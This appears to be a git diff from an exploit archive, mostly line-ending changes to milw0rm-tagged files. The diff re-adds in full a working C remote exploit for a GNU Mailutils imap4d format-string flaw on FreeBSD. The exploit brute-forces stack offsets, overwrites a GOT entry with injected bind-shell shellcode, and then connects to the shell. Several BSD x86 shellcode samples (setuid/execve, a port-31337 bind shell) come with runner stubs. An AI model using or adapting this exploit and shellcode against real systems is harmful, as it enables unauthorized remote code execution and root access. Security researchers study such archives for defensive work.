buildstring(got_entry, shell_addr+=3, offset, sock); - fprintf(stdout,"[+] Decoy found at %p\n", shell_addr); - close(sock); - fprintf(stdout, "[+] Trying to contact the bind shell ..\n"); - if((comun(host, sin4)) < 0) - fprintf(stderr, "[-] Exploit failed\n"); - } - else - ++ptr; - } - } - if( shell_addr > 0xc0000000) - break; - shell_addr++; - ptr = ((char *)&shell_addr); - ptr[4] = 0; - if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00) - { - shell_addr ++; - ptr = ((char *)&shell_addr); - ptr[4] = 0; - } - while (strlen(ptr) !=4) - { - shell_addr++; - ptr = ((char *)&shell_addr); - ptr[4] = 0; - } - if (have_shell_loc != 1) - { - send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code); - } - } - clean(buffer); - } - - fprintf(stderr, "[+] Closing connection\n"); - close(sock); - free(host); - - fprintf(stderr, "[-] Exploit failed %p\n", shell_addr); - return 0; -} - -// milw0rm.com [2005-09-26] +/* +* Copyright (c) 2005 Rosiello Security +* http://www.rosiello.org +* +* Permission is granted for the redistribution of this software +* electronically. It may not be edited in any way without the express +* written consent of Rosiello Security. +* +* Disclaimer: The author published the information under the condition +* that is not in the intention of the reader to use them in order to bring +* to himself or others a profit or to bring to others damage. +* +* -------------------------------------------------------------------------- +* +* GNU Mailutils 0.6 imap4d 'search' Format String Vulnerability +* iDEFENSE Security Advisory 09.09.05 +* www.idefense.com/application/poi/display?id=303&type=vulnerabilities +* +* The GNU mailutils package is a collection of mail-related +* utilities, including local and remote mailbox access services. +* More information is available at the following site: +* http://www.gnu.org/software/mailutils/mailutils.html +* +* This exploit shows the possibility to run arbitrary code +* on FreeBSD machines. +* +* Authors: Johnny Mast and Angelo Rosiello +* e-mails: rave@rosiello.org angelo@rosiello.org +*/ + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + + +#define ISIP(m) (!((int)inet_addr(m) ==-1)) +#define clean(x) memset(x, 0 , sizeof x) + +char code[] = +"\x90\x90\x90\x90" +"\x90\x90\x90\x90" +"\x90\x90\x90\x90" +"\x31\xc0" /* xor %eax,%eax */ +"\x31\xc0" /* xor %eax,%eax */ +"\x50" /* push %eax */ +"\x31\xc0" /* xor %eax,%eax */ +"\x50" /* push %eax */ +"\xb0\x7e" /* mov $0x7e,%al */ +"\x50" /* push %eax */ +"\xcd\x80" /* int $0x80 */ +"\x31\xc0" /* xor %eax,%eax */ + +/* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */ +"\x31\xc0" // xorl %eax,%eax +"\x31\xdb" // xorl %ebx,%ebx +"\x31\xc9" // xorl %ecx,%ecx +"\x31\xd2" // xorl %edx,%edx +"\xb0\x61" // movb $0x61,%al +"\x51" // pushl %ecx +"\xb1\x06" // movb $0x6,%cl +"\x51" // pushl %ecx +"\xb1\x01" // movb $0x1,%cl +"\x51" // pushl %ecx +"\xb1\x02" // movb $0x2,%cl +"\x51" // pushl %ecx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\xcd\x80" // int $0x80 + +/* it binds on port 30464 */ +/* bind(fd, (struct sockaddr*)&sin, sizeof(sin)) */ +"\xb1\x02" // movb $0x2,%cl +"\x31\xc9" // xorl %ecx,%ecx +"\x51" // pushl %ecx +"\x51" // pushl %ecx +"\x51" // pushl %ecx + +/* port = 0x77, change if needed */ +"\x80\xc1\x77" // addb $0x77,%cl +"\x66\x51" // pushw %cx +"\xb5\x02" // movb $0x2,%ch +"\x66\x51" // pushw %cx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\xb2\x10" // movb $0x10,%dl +"\x52" // pushl %edx +"\x51" // pushl %ecx +"\x50" // pushl %eax +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\x89\xc2" // movl %eax,%edx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x68" // movb $0x68,%al +"\xcd\x80" // int $0x80 + +/* listen(fd, 1)*/ +"\xb3\x01" // movb $0x1,%bl +"\x53" // pushl %ebx +"\x52" // pushl %edx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x6a" // movb $0x6a,%al +"\xcd\x80" // int $0x80 + +/* cli = accept(fd, 0,0) */ +"\x31\xc0" // xorl %eax,%eax +"\x50" // pushl %eax +"\x50" // pushl %eax +"\x52" // pushl %edx +"\x8d\x0c\x24" // leal (%esp),%ecx +"\x51" // pushl %ecx +"\x31\xc9" // xorl %ecx,%ecx +"\xb0\x1e" // movb $0x1e,%al +"\xcd\x80" // int $0x80 + +/* dup2(cli,0) */ +"\x89\xc3" // movl %eax,%ebx +"\x53" // pushl %ebx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x5a" // movb $0x5a,%al +"\xcd\x80" // int $0x80 + +/* dup2(cli, 1) */ +"\x41" // inc %ecx +"\x53" // pushl %ebx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x5a" // movb $0x5a,%al +"\xcd\x80" // int $0x80 + +/* dup2(cli, 2) */ +"\x41" // inc %ecx +"\x53" // pushl %ebx +"\x51" // pushl %ecx +"\x31\xc0" // xorl %eax,%eax +"\xb0\x5a" // movb $0x5a,%al +"\xcd\x80" // int $0x80 + +/* execve("//bin/sh", ["//bin/sh", NULL], NULL) */ +"\x31\xdb" // xorl %ebx,%ebx +"\x53" // pushl %ebx +"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e +"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f +"\x89\xe3" // movl %esp,%ebx +"\x31\xc0" // xorl %eax,%eax +"\x50" // pushl %eax +"\x54" // pushl %esp +"\x53" // pushl %ebx +"\x50" // pushl %eax +"\xb0\x3b" // mov $0x3b,%al +"\xcd\x80" // int $0x80 + +/* exit(..) */ +"\x31\xc0" // xorl %eax,%eax +"\xb0\x01" // mobv $0x1,%al +"\xcd\x80"; // int $0x80 + + + +void usage( int argc, char **argv ) +{ + + fprintf(stdout, "%s usage:\n\n", argv[0]); + fprintf(stdout, "\t-h host\n"); + fprintf(stdout, "\t-p port\n"); + fprintf(stdout, "\t-l login\n"); + fprintf(stdout, "\t-a password\n\n"); + + return; +} + + +void send_message( int fd, char *msg, ... ) +{ + char string[2000]; + int len; + size_t size; + + va_list args; + + + clean(string); + + + va_start(args, msg); + len = vsnprintf(string, sizeof(string)-1, msg,args); + len = (len >=0) ? len : 0; + + /* Terminating the string */ + string[len]='\0'; + + write(fd, string, len); + + return; +} + + + + + +char *buildstring( long r_addr, long target, int offset, int sock ) +{ + unsigned char string[512], a[4]; + int len; + int high, low, arw; + + + + high = ( target & 0xffff0000 ) >> 16; + low = ( target & 0x0000ffff ); + + clean(a); + a[0] = (r_addr >> 24) & 0xff; + a[1] = (r_addr >> 16) & 0xff; + a[2] = (r_addr >> 8) & 0xff; + a[3] = (r_addr) & 0xff; + a[4] = '\0'; + + clean(string); + len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn\n", + (int)a[3]+2,a[2],a[1],a[0], + high -(0x24+13), /* Number of bytes for the first write */ + offset /* The Offset to addr */ + ); + + len = (len >=0) ? len : 0; + string[len] = '\0'; + write(sock, string, len); + + read(sock, string, sizeof(string)); + + + clean(string); + len = sprintf(string, "3 search topic .%c%c%c%c%%.%dx%%%d$hn%s\n", + (int) a[3], (int)a[2], (int)a[1],(int)a[0], + low - (0x24 +13), + offset, /* The offset to addr +2 */ + code + ); + + len = (len >=0) ? len : 0; + string[len] = '\0'; + write(sock, string, len); + + + return (char *)strdup(string); +} + + +void get_addr_as_char( u_int addr, char *buf ) +{ + *(u_int*)buf = addr; + if (!buf[0]) buf[0]++; + if (!buf[1]) buf[1]++; + if (!buf[2]) buf[2]++; + if (!buf[3]) buf[3]++; +} + +static int got_entry = 0x08057a0c+4; + + +int comun( char *host, struct sockaddr_in sin4 ) +{ + char *a[4] = { "/usr/bin/telnet", host , "30464", NULL }; + execve(a[0],a, NULL); + return 0; +} + +void welcome( ) +{ + fprintf( stdout, "\nCopyright (c) 2005 Rosiello Security\n" ); + fprintf( stdout, "http://www.rosiello.org\n" ); + fprintf( stdout, "imap4d Format String Exploiter for FreeBSD\n\n" ); +} + +int main( int argc, char **argv ) +{ + struct hostent *hp; + struct sockaddr_in sin4; + char shellbuf[1030]; + char *host, buffer[512], *ptr, *p, *USER, *PASS; + int ch, port = 0, sock, offset = 1; + int login = 0, i, calc = 0; + int ret = 0, len = 0, b; + int have_shell_loc = 0; + unsigned int shell_addr = (u_int)0x0806c000; + + welcome( ); + + if ( argc < 9 ) + { + usage(argc, argv); + exit(EXIT_SUCCESS); + } + + if (!(host = malloc (128))) + { + fprintf(stderr, "exp.c:115 Could not allocate memory\n"); + exit(EXIT_FAILURE); + } + + + while((ch = getopt(argc, argv, "h:p:l:a:")) != EOF) + { + switch(ch) + { + case 'h': + host = (char *)strdup(optarg); + break; + + case 'V': + break; + + case 'p': + port = atoi (optarg); + break; + + case 'l': + USER = (char *)optarg; + break; + + case 'a': + PASS = (char *)optarg; + break; + + default: + usage(argc, argv); + break; + } +} + + + + if ((sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) + { + fprintf(stderr, "exp.c:139 Error creating an new socket"); + exit(EXIT_FAILURE); + } + + host = (host) ? host : "localhost"; + port = (port) ? port : 143; + + if (!(ISIP(host))) + { + if (!(hp = gethostbyname(host))) + { + fprintf(stderr, "exp.c:152 Could not resolve ip address\n"); + exit(EXIT_FAILURE); + } + + memcpy(&sin4.sin_addr,hp->h_addr,hp->h_length); + host = (char *)strdup(inet_ntoa(sin4.sin_addr)); + } else + sin4.sin_addr.s_addr = inet_addr(host); + + + + + sin4.sin_family = AF_INET; + sin4.sin_port = (unsigned short)htons( port ); + + fprintf(stdout, "[+] Connecting to %s:%d\n", host,port); + + if ((connect(sock, (struct sockaddr *)&sin4,sizeof(struct sockaddr))) < 0) + { + fprintf(stderr, "[*] exp.c:178 Connection failed\n"); + exit(EXIT_FAILURE); + } + + + fprintf(stdout, "[+] Connected .. \n"); + fprintf(stdout, "[+] Sending login ... \n"); + + send_message(sock, "1 LOGIN %s %s\r\n", USER, PASS); + fprintf(stdout, "[+] Done ... \n"); + + while ((read(sock, buffer, 512)) > 0) + { + if ( login == 0 && ret == 0) + switch (buffer[0]) + { + + case '1': + fprintf(stdout, "[+] Selecting inbox ..\n"); + send_message(sock, "2 Select inbox\n"); + fprintf(stdout, "[+] Selecting Done .. Starting brute sequence\n"); + send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); + login = 1; + break; + } + + + if ((ptr=strstr(buffer, "(near")) && login == 1) + { + ptr +=15; + if ((strncmp(ptr, "41414141",8))!=0) + { + offset ++; + send_message(sock, "3 search topic .AAAABBBB%%%d$x\n",offset); + } + else + { + fprintf(stdout, "[+] Found offset %d\n", offset); + fprintf(stdout, "[+] Finding buffer on the stack\n"); + ret = 1; + login = 0; + clean(buffer); + } + } + + if ( ret == 1 ) + { + + if ((ptr=strstr(buffer, "(near"))) + { + ptr +=6+4 +1; /* +4 for the addr string*/ + /* +1 for the junk char */ + calc = strlen(buffer) - strlen(ptr); + calc -=6+4+1; + + for (i = 0; i < strlen(buffer); i++) + { + if ( (strncmp(ptr, code, strlen(code)))==0 && have_shell_loc !=1) + { + shell_addr += i -4; + have_shell_loc = 1; + sleep(2); + buildstring(got_entry, shell_addr+=3, offset, sock); + fprintf(stdout,"[+] Decoy found at %p\n", shell_addr); + close(sock); + fprintf(stdout, "[+] Trying to contact the bind shell ..\n"); + if((comun(host, sin4)) < 0) + fprintf(stderr, "[-] Exploit failed\n"); + } + else + ++ptr; + } + } + if( shell_addr > 0xc0000000) + break; + shell_addr++; + ptr = ((char *)&shell_addr); + ptr[4] = 0; + if ( strchr(ptr, 0xa) || strchr(ptr, 0xd) || ptr[0]==0x00) + { + shell_addr ++; + ptr = ((char *)&shell_addr); + ptr[4] = 0; + } + while (strlen(ptr) !=4) + { + shell_addr++; + ptr = ((char *)&shell_addr); + ptr[4] = 0; + } + if (have_shell_loc != 1) + { + send_message(sock, "3 search topic .%s....%%%d$s%sCCCC\n",ptr,offset,code); + } + } + clean(buffer); + } + + fprintf(stderr, "[+] Closing connection\n"); + close(sock); + free(host); + + fprintf(stderr, "[-] Exploit failed %p\n", shell_addr); + return 0; +} + +// milw0rm.com [2005-09-26] diff --git a/platforms/bsd/remote/228.c b/platforms/bsd/remote/228.c index 61f6c9ded..eda7bca20 100755 --- a/platforms/bsd/remote/228.c +++ b/platforms/bsd/remote/228.c @@ -242,6 +242,6 @@ while (1) } } } - - -// milw0rm.com [2000-12-15] + + +// milw0rm.com [2000-12-15] diff --git a/platforms/bsd/remote/234.c b/platforms/bsd/remote/234.c index 6430cac73..4bed46335 100755 --- a/platforms/bsd/remote/234.c +++ b/platforms/bsd/remote/234.c @@ -496,6 +496,6 @@ xrecieve(int fd, char *buf, int size) perror("read"); /* XXX */ exit(-1); } - - -// milw0rm.com [2000-12-20] + + +// milw0rm.com [2000-12-20] diff --git a/platforms/bsd/remote/409.c b/platforms/bsd/remote/409.c index 458a9db64..6a12d29f4 100755 --- a/platforms/bsd/remote/409.c +++ b/platforms/bsd/remote/409.c @@ -872,6 +872,6 @@ x86_nop (unsigned char *dest, unsigned int dest_len, } return (walk); -} - -// milw0rm.com [2001-06-09] +} + +// milw0rm.com [2001-06-09] diff --git a/platforms/bsd/remote/432.c b/platforms/bsd/remote/432.c index 4c3662855..eb8944f61 100755 --- a/platforms/bsd/remote/432.c +++ b/platforms/bsd/remote/432.c @@ -416,6 +416,6 @@ main (int argc, char **argv) { printf("[*] Checking for shell..\n"); root(host); -} - -// milw0rm.com [2004-09-02] +} + +// milw0rm.com [2004-09-02] diff --git a/platforms/bsd/shellcode/13242.txt b/platforms/bsd/shellcode/13242.txt index 1e7b04cc5..b272bccab 100755 --- a/platforms/bsd/shellcode/13242.txt +++ b/platforms/bsd/shellcode/13242.txt @@ -142,6 +142,6 @@ void main() { (*ret) = (int)shellcode; } - - + + # milw0rm.com [2000-11-19] \ No newline at end of file diff --git a/platforms/bsd_ppc/shellcode/13243.c b/platforms/bsd_ppc/shellcode/13243.c index 50770802b..7eea1426b 100755 --- a/platforms/bsd_ppc/shellcode/13243.c +++ b/platforms/bsd_ppc/shellcode/13243.c @@ -69,6 +69,6 @@ L2: bl L1 # branch and link back to L1 .Lfe1: .size m,.Lfe1-m -*/ - +*/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13244.c b/platforms/bsd_x86/shellcode/13244.c index d6438fed6..aeaa21cdc 100755 --- a/platforms/bsd_x86/shellcode/13244.c +++ b/platforms/bsd_x86/shellcode/13244.c @@ -1,45 +1,45 @@ -/* - * $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ - * - * setuid-bsd.c - setuid/execve shellcode for *BSD/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Short setuid(0) and /bin/sh execve() shellcode (based on esdee's code). - * - * Tested on OpenBSD and FreeBSD. - */ - -/* - * setuid(0) - * - * 20c8: 31 c0 xor %eax,%eax - * 20ca: 50 push %eax - * 20cb: 50 push %eax - * 20cc: b0 17 mov $0x17,%al - * 20ce: cd 80 int $0x80 - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 20d0: 31 c0 xor %eax,%eax - * 20d2: 50 push %eax - * 20d3: 68 2f 2f 73 68 push $0x68732f2f - * 20d8: 68 2f 62 69 6e push $0x6e69622f - * 20dd: 89 e3 mov %esp,%ebx - * 20df: 50 push %eax - * 20e0: 54 push %esp - * 20e1: 53 push %ebx - * 20e2: 50 push %eax - * 20e3: b0 3b mov $0x3b,%al - * 20e5: cd 80 int $0x80 - */ - -char sc[] = /* 7 + 23 = 30 bytes */ -"\x31\xc0\x50\x50\xb0\x17\xcd\x80" -"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: setuid-bsd.c,v 1.6 2004/06/02 12:22:30 raptor Exp $ + * + * setuid-bsd.c - setuid/execve shellcode for *BSD/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Short setuid(0) and /bin/sh execve() shellcode (based on esdee's code). + * + * Tested on OpenBSD and FreeBSD. + */ + +/* + * setuid(0) + * + * 20c8: 31 c0 xor %eax,%eax + * 20ca: 50 push %eax + * 20cb: 50 push %eax + * 20cc: b0 17 mov $0x17,%al + * 20ce: cd 80 int $0x80 + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 20d0: 31 c0 xor %eax,%eax + * 20d2: 50 push %eax + * 20d3: 68 2f 2f 73 68 push $0x68732f2f + * 20d8: 68 2f 62 69 6e push $0x6e69622f + * 20dd: 89 e3 mov %esp,%ebx + * 20df: 50 push %eax + * 20e0: 54 push %esp + * 20e1: 53 push %ebx + * 20e2: 50 push %eax + * 20e3: b0 3b mov $0x3b,%al + * 20e5: cd 80 int $0x80 + */ + +char sc[] = /* 7 + 23 = 30 bytes */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x80" +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13245.c b/platforms/bsd_x86/shellcode/13245.c index 8441d077a..936389626 100755 --- a/platforms/bsd_x86/shellcode/13245.c +++ b/platforms/bsd_x86/shellcode/13245.c @@ -1,112 +1,112 @@ -/* - * $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ - * - * portbind-bsd.c - setuid/portbind shellcode for *BSD/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Simple portbind shellcode that bind()'s a setuid(0) shell on - * port 31337/tcp (based on bighawk's code). - * - * Tested on OpenBSD and FreeBSD. - */ - -/* - * setuid(0) - * - * 20c8: 31 c0 xor %eax,%eax - * 20ca: 50 push %eax - * 20cb: 50 push %eax - * 20cc: b0 17 mov $0x17,%al - * 20ce: cd 80 int $0x80 - * - * socket(AF_INET, SOCK_STREAM, 0) - * - * 20d0: 31 c9 xor %ecx,%ecx - * 20d2: f7 e1 mul %ecx,%eax - * 20d4: 51 push %ecx - * 20d5: 41 inc %ecx - * 20d6: 51 push %ecx - * 20d7: 41 inc %ecx - * 20d8: 51 push %ecx - * 20d9: 51 push %ecx - * 20da: b0 61 mov $0x61,%al - * 20dc: cd 80 int $0x80 - * - * bind(s, server, sizeof(server)) - * - * 20de: 89 c3 mov %eax,%ebx - * 20e0: 52 push %edx - * 20e1: 66 68 7a 69 pushw $0x697a - * 20e5: 66 51 push %cx - * 20e7: 89 e6 mov %esp,%esi - * 20e9: b1 10 mov $0x10,%cl - * 20eb: 51 push %ecx - * 20ec: 56 push %esi - * 20ed: 50 push %eax - * 20ee: 50 push %eax - * 20ef: b0 68 mov $0x68,%al - * 20f1: cd 80 int $0x80 - * - * listen(s, 1) - * - * 20f3: 51 push %ecx - * 20f4: 53 push %ebx - * 20f5: 53 push %ebx - * 20f6: b0 6a mov $0x6a,%al - * 20f8: cd 80 int $0x80 - * - * accept(s, 0, 0) - * - * 20fa: 52 push %edx - * 20fb: 52 push %edx - * 20fc: 53 push %ebx - * 20fd: 53 push %ebx - * 20fe: b0 1e mov $0x1e,%al - * 2100: cd 80 int $0x80 - * - * dup2(c, 2) - * dup2(c, 1) - * dup2(c, 0) - * - * 2102: b1 03 mov $0x3,%cl - * 2104: 89 c3 mov %eax,%ebx - * 2106: b0 5a mov $0x5a,%al - * 2108: 49 dec %ecx - * 2109: 51 push %ecx - * 210a: 53 push %ebx - * 210b: 53 push %ebx - * 210c: cd 80 int $0x80 - * 210e: 41 inc %ecx - * 210f: e2 f5 loop 2106 <_sc+0x3e> - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 2111: 51 push %ecx - * 2112: 68 2f 2f 73 68 push $0x68732f2f - * 2117: 68 2f 62 69 6e push $0x6e69622f - * 211c: 89 e3 mov %esp,%ebx - * 211e: 51 push %ecx - * 211f: 54 push %esp - * 2120: 53 push %ebx - * 2121: 53 push %ebx - * 2122: b0 3b mov $0x3b,%al - * 2124: cd 80 int $0x80 - */ - -char sc[] = /* 8 + 86 = 94 bytes */ -"\x31\xc0\x50\x50\xb0\x17\xcd\x80" -"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80" -"\x89\xc3\x52\x66\x68" -"\x7a\x69" // port 31337/tcp, change if needed -"\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80" -"\x51\x53\x53\xb0\x6a\xcd\x80" -"\x52\x52\x53\x53\xb0\x1e\xcd\x80" -"\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80" -"\x41\xe2\xf5\x51\x68//sh\x68/bin\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: portbind-bsd.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ + * + * portbind-bsd.c - setuid/portbind shellcode for *BSD/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Simple portbind shellcode that bind()'s a setuid(0) shell on + * port 31337/tcp (based on bighawk's code). + * + * Tested on OpenBSD and FreeBSD. + */ + +/* + * setuid(0) + * + * 20c8: 31 c0 xor %eax,%eax + * 20ca: 50 push %eax + * 20cb: 50 push %eax + * 20cc: b0 17 mov $0x17,%al + * 20ce: cd 80 int $0x80 + * + * socket(AF_INET, SOCK_STREAM, 0) + * + * 20d0: 31 c9 xor %ecx,%ecx + * 20d2: f7 e1 mul %ecx,%eax + * 20d4: 51 push %ecx + * 20d5: 41 inc %ecx + * 20d6: 51 push %ecx + * 20d7: 41 inc %ecx + * 20d8: 51 push %ecx + * 20d9: 51 push %ecx + * 20da: b0 61 mov $0x61,%al + * 20dc: cd 80 int $0x80 + * + * bind(s, server, sizeof(server)) + * + * 20de: 89 c3 mov %eax,%ebx + * 20e0: 52 push %edx + * 20e1: 66 68 7a 69 pushw $0x697a + * 20e5: 66 51 push %cx + * 20e7: 89 e6 mov %esp,%esi + * 20e9: b1 10 mov $0x10,%cl + * 20eb: 51 push %ecx + * 20ec: 56 push %esi + * 20ed: 50 push %eax + * 20ee: 50 push %eax + * 20ef: b0 68 mov $0x68,%al + * 20f1: cd 80 int $0x80 + * + * listen(s, 1) + * + * 20f3: 51 push %ecx + * 20f4: 53 push %ebx + * 20f5: 53 push %ebx + * 20f6: b0 6a mov $0x6a,%al + * 20f8: cd 80 int $0x80 + * + * accept(s, 0, 0) + * + * 20fa: 52 push %edx + * 20fb: 52 push %edx + * 20fc: 53 push %ebx + * 20fd: 53 push %ebx + * 20fe: b0 1e mov $0x1e,%al + * 2100: cd 80 int $0x80 + * + * dup2(c, 2) + * dup2(c, 1) + * dup2(c, 0) + * + * 2102: b1 03 mov $0x3,%cl + * 2104: 89 c3 mov %eax,%ebx + * 2106: b0 5a mov $0x5a,%al + * 2108: 49 dec %ecx + * 2109: 51 push %ecx + * 210a: 53 push %ebx + * 210b: 53 push %ebx + * 210c: cd 80 int $0x80 + * 210e: 41 inc %ecx + * 210f: e2 f5 loop 2106 <_sc+0x3e> + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 2111: 51 push %ecx + * 2112: 68 2f 2f 73 68 push $0x68732f2f + * 2117: 68 2f 62 69 6e push $0x6e69622f + * 211c: 89 e3 mov %esp,%ebx + * 211e: 51 push %ecx + * 211f: 54 push %esp + * 2120: 53 push %ebx + * 2121: 53 push %ebx + * 2122: b0 3b mov $0x3b,%al + * 2124: cd 80 int $0x80 + */ + +char sc[] = /* 8 + 86 = 94 bytes */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x80" +"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80" +"\x89\xc3\x52\x66\x68" +"\x7a\x69" // port 31337/tcp, change if needed +"\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80" +"\x51\x53\x53\xb0\x6a\xcd\x80" +"\x52\x52\x53\x53\xb0\x1e\xcd\x80" +"\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80" +"\x41\xe2\xf5\x51\x68//sh\x68/bin\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13246.c b/platforms/bsd_x86/shellcode/13246.c index 133553556..cfb59b951 100755 --- a/platforms/bsd_x86/shellcode/13246.c +++ b/platforms/bsd_x86/shellcode/13246.c @@ -40,6 +40,6 @@ execve_sh.s strings: call start .string "/bin/sh" -*********************************************/ - +*********************************************/ + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13247.c b/platforms/bsd_x86/shellcode/13247.c index 8aad5f615..c0e4fbadd 100755 --- a/platforms/bsd_x86/shellcode/13247.c +++ b/platforms/bsd_x86/shellcode/13247.c @@ -34,6 +34,6 @@ main() printf("Shellcode lenght=%d\n",sizeof(shellcode)); ret=(int*)&ret+2; (*ret)=(int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13248.c b/platforms/bsd_x86/shellcode/13248.c index d0b3091dc..da61cc3a3 100755 --- a/platforms/bsd_x86/shellcode/13248.c +++ b/platforms/bsd_x86/shellcode/13248.c @@ -59,6 +59,6 @@ main() printf("\nportbinding execve() shellcode (port 31337) bsd/x86 (%db) - no1 (greyhats.za.net)\n",strlen(shellc0de)); sc(); return; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13250.c b/platforms/bsd_x86/shellcode/13250.c index 9e72a832d..9c923c238 100755 --- a/platforms/bsd_x86/shellcode/13250.c +++ b/platforms/bsd_x86/shellcode/13250.c @@ -43,6 +43,6 @@ main() printf("Shellcode lenght=%d\n",sizeof(shellcode)); ret=(int*)&ret+2; (*ret)=(int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13251.c b/platforms/bsd_x86/shellcode/13251.c index 64fd09541..2ba374edd 100755 --- a/platforms/bsd_x86/shellcode/13251.c +++ b/platforms/bsd_x86/shellcode/13251.c @@ -37,6 +37,6 @@ main(void) int *ret; ret = (int*)&ret + 2; (*ret) = shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13252.c b/platforms/bsd_x86/shellcode/13252.c index 895cfb5c2..38d306d85 100755 --- a/platforms/bsd_x86/shellcode/13252.c +++ b/platforms/bsd_x86/shellcode/13252.c @@ -24,6 +24,6 @@ main() printf("Shellcode lenght=%d\n",sizeof(shellcode)); ret=(int*)&ret+2; (*ret)=(int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13254.c b/platforms/bsd_x86/shellcode/13254.c index 409a92b92..fee16c617 100755 --- a/platforms/bsd_x86/shellcode/13254.c +++ b/platforms/bsd_x86/shellcode/13254.c @@ -67,6 +67,6 @@ main() int *ret; ret=(int*)&ret+2; (*ret)=(int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13255.c b/platforms/bsd_x86/shellcode/13255.c index 929fa6c03..0e1ebaefa 100755 --- a/platforms/bsd_x86/shellcode/13255.c +++ b/platforms/bsd_x86/shellcode/13255.c @@ -42,6 +42,6 @@ main() printf("Shellcode lenght=%d\n",sizeof(shellcode)); ret=(int*)&ret+2; (*ret)=(int)shellcode; -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsd_x86/shellcode/13256.c b/platforms/bsd_x86/shellcode/13256.c index f543753da..813f52c65 100755 --- a/platforms/bsd_x86/shellcode/13256.c +++ b/platforms/bsd_x86/shellcode/13256.c @@ -61,6 +61,6 @@ main(int argc, char ** argv) f = (void *) shellcode; f(); -} - +} + // milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsdi_x86/shellcode/13257.txt b/platforms/bsdi_x86/shellcode/13257.txt index 86cdb50e9..dabcca4bb 100755 --- a/platforms/bsdi_x86/shellcode/13257.txt +++ b/platforms/bsdi_x86/shellcode/13257.txt @@ -6,6 +6,6 @@ char bsdi_shell[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" - "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; - + "\xff\xe8\xdc\xff\xff\xff/bin/sh\x00"; + # milw0rm.com [2004-09-26] \ No newline at end of file diff --git a/platforms/bsdi_x86/shellcode/13258.txt b/platforms/bsdi_x86/shellcode/13258.txt index caa9f6555..17fe5998b 100755 --- a/platforms/bsdi_x86/shellcode/13258.txt +++ b/platforms/bsdi_x86/shellcode/13258.txt @@ -7,6 +7,6 @@ static char exec[]= "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */ 